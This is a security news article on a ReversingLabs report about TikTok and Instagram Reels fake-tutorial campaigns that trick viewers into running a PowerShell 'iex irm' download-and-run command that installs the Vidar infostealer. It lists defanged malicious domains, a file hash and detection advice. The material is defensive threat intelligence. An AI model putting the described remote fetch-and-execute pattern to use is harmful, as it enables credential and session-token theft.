Cybercriminals are increasingly turning short-form video platforms into malware distribution channels, using polished fake tutorials on TikTok and Instagram Reels to trick users into installing malicious software. In the latest campaign, the TikTok malware scam centers on promises of free premium apps such as Spotify Premium or Microsoft Word, but the real payload is Vidar stealer, a long-running malware-as-a-service operation known for stealing credentials, financial data, and session tokens.

The activity was analyzed by ReversingLabs researcher Zaria Vuksan, who documented two separate campaign styles that exploited recommendation algorithms and user engagement to scale quickly across both platforms. The research shows how attackers are adapting classic social engineering techniques to social video ecosystems where “how-to” content looks routine and trusted.

Key Details

According to ReversingLabs, both campaigns had the same objective: drive victims to third-party sites or commands that ultimately deliver malware disguised as free software. What changed between the two methods was the trust-building strategy—one leaned on highly polished tutorial branding, while the other relied on casual “proof” videos and comment bait to build curiosity before redirecting users to malicious links.

In the first campaign, attackers used accounts with names such as “windows.tips” and “windows.insights”, plus blue-and-white profile imagery that mimicked Microsoft’s visual identity. The videos used clean graphics and AI-generated voiceovers to walk viewers through entering a PowerShell command that supposedly unlocked Spotify Premium, when in reality it pulled and executed malicious code from attacker-controlled infrastructure such as msget[.]run.

The second campaign took a more informal approach. Instead of overt tutorials, the threat actors posted short videos showing premium Spotify features while using trending music and vague captions meant to trigger comments. Once users asked how the software was obtained for free, the attackers replied with directions to sites such as pluginchad[.]xyz, maxapk[.]xyz, or d4ug[.]site, the latter presenting fake offers to “unlock premium games & AI tools.”

What made the operation especially effective was scale. ReversingLabs observed videos surpassing 100,000 views, with some samples showing more saves than likes—a meaningful signal because saves, shares, and comments carry strong weight in social recommendation systems. In one example, a lure video drew 109,000 views, 1,699 saves, 1,581 likes, and 974 shares, demonstrating how easily malicious content can blend into mainstream engagement patterns.

Technical Analysis

The most dangerous aspect of the first campaign was its use of PowerShell-based user execution. The command shown in the tutorial used iex irm behavior to download and run a remote script, a technique that hides malicious delivery behind a legitimate Windows administration feature. In practical terms, the victim becomes the initial execution mechanism by copying and pasting instructions that appear harmless or even helpful.

From a MITRE ATT&CK perspective, the campaign maps closely to T1059.001 (PowerShell) and T1204 (User Execution), with remote payload retrieval also fitting T1105 (Ingress Tool Transfer). The malware identified in the first campaign was Vidar stealer, delivered as build.exe and tied to the SHA-256 hash 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153.

Vidar remains a serious threat because it is both accessible and capable. ReversingLabs described it as a popular malware-as-a-service offering that steals credentials, financial information, and tokens, while Trend Micro reported that Vidar 2.0—released in October 2025—was rewritten in C, added multithreaded data theft, and improved anti-analysis and evasion features. That combination makes it attractive to threat actors who want a low-cost, mature infostealer with strong operational support.

The social delivery mechanism matters just as much as the malware itself. ReversingLabs found that attackers are deliberately optimizing for how social platforms reward engagement. Tutorials naturally attract saves and shares, while vague “look what I got for free” videos provoke comments and follow-up questions. That means the recommendation engine effectively amplifies the campaign before defenders—or the platform—can respond.

Impact and Risks

The risk extends far beyond individual users chasing pirated software. Vidar stealer can harvest browser credentials, session cookies, tokens, financial data, and other sensitive information that may later be used for account takeover, fraud, or corporate intrusion. If an employee runs one of these commands on a work device, the result could be a direct path into enterprise SaaS accounts, internal portals, and cloud environments.

This also creates a difficult visibility problem for defenders. Unlike traditional phishing, there may be no malicious email, attachment, or suspicious URL delivered through standard channels. The weaponized content exists as spoken or visual instructions inside a social media post, making many traditional email and web security controls less effective at stopping the initial compromise.

ReversingLabs also found that reporting and community moderation are not reliable safeguards. Researchers said their attempts to report malicious Instagram accounts as scams were rejected, while attackers could simply delete warning comments and block users who tried to alert others. That delays takedowns and gives campaigns more time to spread.

Expert Recommendations

Organizations should immediately expand security awareness training to cover social media as an attack vector, not just email and SMS. Employees need to understand that copy-pasting terminal or PowerShell commands from TikTok, Instagram Reels, YouTube Shorts, Reddit, or Discord is inherently risky—especially when the content promises free access to paid software or “activation” shortcuts.

Security teams should also tighten installation permissions and application control on managed endpoints. ReversingLabs specifically advised auditing who can install software on work devices, while defenders should monitor for suspicious PowerShell activity, unexpected use of iex irm, outbound connections to known malicious domains such as msget[.]run or slmgr[.]sh, and execution of hashes associated with Vidar.

Additional controls should include EDR detections for script-based payload delivery, browser credential theft behavior, and token exfiltration, alongside multi-factor authentication and session hygiene for high-value accounts. Because infostealers often target browser sessions and stored credentials, organizations should also review cookie theft response playbooks and ensure rapid invalidation of exposed sessions.

Industry Context

This campaign fits a broader pattern: malware operators are shifting toward trust-based delivery instead of relying solely on exploits or classic phishing emails. In May 2025, researchers documented TikTok videos that pushed users to execute malicious PowerShell commands to install Vidar and StealC, showing that short-form social content had already emerged as a viable malware channel before the newly documented TikTok and Instagram campaigns.

The bigger trend is clear. Attackers no longer need a zero-day to infect users at scale if they can hijack recommendation systems, mimic trusted branding, and exploit the credibility generated by views, likes, saves, and comments. As generative AI lowers the cost of producing voiceovers, visuals, and copy at scale, campaigns like this are likely to become more frequent and harder to distinguish from legitimate creator content.

Conclusion

The latest ReversingLabs findings show that TikTok and Instagram Reels are no longer just social platforms—they are becoming active malware delivery surfaces. By combining persuasive fake tutorials, engagement-driven distribution, and a proven infostealer like Vidar, threat actors have created a social engineering model that is cheap, scalable, and alarmingly effective.

For defenders, the lesson is straightforward: treat social video content that promotes “free” premium tools or asks users to run system commands with the same suspicion once reserved for phishing emails. The delivery channel has changed, but the outcome—credential theft and downstream compromise—remains the same.

FAQ SECTION

1. What is the TikTok malware scam?

The TikTok malware scam refers to fake tutorial videos that promise free premium software but actually direct users to run malicious commands or download infected files, often leading to Vidar stealer infections.

2. How does Instagram Reels malware spread in this campaign?

Attackers post short, convincing clips that attract comments and curiosity, then reply with malicious links or redirect users to fake software-download sites such as pluginchad[.]xyz and d4ug[.]site.

3. What does Vidar stealer do after infection?

Vidar steals credentials, browser data, financial information, and session tokens, which can be used for fraud, account takeover, or follow-on attacks against organizations.

4. Why are these social media malware campaigns effective?

They blend into normal social media behavior, exploit recommendation algorithms, and use views, likes, saves, shares, and comments to build credibility before delivering the malicious payload.

5. How can organizations defend against fake software tutorial attacks?

They should restrict installation rights, monitor PowerShell and script execution, train employees on social media threats, deploy EDR for infostealer behavior, and aggressively report malicious accounts and domains.